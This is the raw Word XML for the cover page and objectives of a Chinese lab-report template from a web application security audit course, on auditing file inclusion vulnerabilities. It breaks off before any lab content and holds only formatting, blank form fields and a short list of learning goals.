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00" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4123055" cy="95504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51934" cy="100810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spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Web应用安全审计课程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>实验（实训）报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2025-2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学年第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学期</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="2409" w:firstLineChars="800"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>学    院：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>人工智能与大数据学院</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="2409" w:firstLineChars="800"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>年    级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="2409" w:firstLineChars="800"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>培养层次：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="2409" w:firstLineChars="800"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>专    业：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  信息安全与管理   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="2409" w:firstLineChars="800"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>班    级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="2409" w:firstLineChars="800"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>学    号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="2409" w:firstLineChars="800"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>姓    名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="2711" w:firstLineChars="900"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="2162" w:firstLineChars="901"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="page" w:tblpX="8036" w:tblpY="1580"/>
        <w:tblW w:w="20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0"/>
        <w:gridCol w:w="12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</w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850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成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210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</w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850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教师</w:t>
            </w:r>
          </w:p>
          <w:p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签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210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</w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>102870</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-172085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2820035" cy="652780"/>
            <wp:effectExtent l="0" t="0" r="18415" b="13970"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="1459" y="0"/>
                <wp:lineTo x="0" y="3152"/>
                <wp:lineTo x="0" y="17019"/>
                <wp:lineTo x="1459" y="20802"/>
                <wp:lineTo x="3356" y="20802"/>
                <wp:lineTo x="20720" y="19541"/>
                <wp:lineTo x="21449" y="18280"/>
                <wp:lineTo x="20866" y="10086"/>
                <wp:lineTo x="21449" y="6304"/>
                <wp:lineTo x="20866" y="1891"/>
                <wp:lineTo x="3502" y="0"/>
                <wp:lineTo x="1459" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="71656756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6567565" name="图片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65186" cy="66370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/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实验（实训）报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00A8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> 验证性 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00A8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>演示性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00FE"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>综合性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00A8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>设计研究性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00A8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> 其他：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>课程名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Web应用安全审计  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>课程性质：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>专业核心课</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>项目名称:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">文件包含漏洞审计  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>指导教师：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 肖泽亮</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>班级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学生姓名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="4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-17145</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>99695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6078855" cy="0"/>
                <wp:effectExtent l="0" t="0" r="36195" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="10" name="直接连接符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78855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1.35pt;margin-top:7.85pt;height:0pt;width:478.65pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1.5pt" color="#000000 [3200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黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验（实训）目的和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1.理解文件包含漏洞的产生原理、分类与危害。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2.掌握本地文件包含（LFI）、远程文件包含（RFI）、Session 文件包含及PHP 伪协议的利用方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3.学会%00截断、%23截断等绕过技巧，完成漏洞验证与利用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4.掌握文件包含漏洞的代码审计要点与安全防御方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="312" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验（实训）内容及原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
